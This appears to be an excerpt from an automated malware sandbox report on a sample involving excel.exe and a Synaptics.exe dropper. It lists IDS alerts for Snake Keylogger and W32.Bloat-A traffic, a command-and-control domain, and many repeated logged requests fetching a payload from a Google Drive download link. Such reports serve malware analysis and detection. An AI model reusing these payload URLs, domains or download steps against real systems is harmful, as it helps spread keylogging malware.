                              Source: excel.exe Memory has grown: Private usage: 1MB later: 67MB

                              Networking

                              Source: Network traffic Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49797 -> 69.42.215.252:80
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49865 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49868 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49802 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49804 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49855 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49825 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49813 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49788 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49824 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49891 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49842 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49902 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49789 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49912 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49856 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49814 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49901 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49844 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49890 -> 172.217.18.14:443
                              Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49910 -> 172.217.18.14:443
                              Source: Malware configuration extractor URLs: xred.mooo.com
                              Source: unknown DNS query: name: freedns.afraid.org
                              Source: Joe Sandbox View IP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C914B54 URLDownloadToFileW,4_2_6C914B54
                              Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
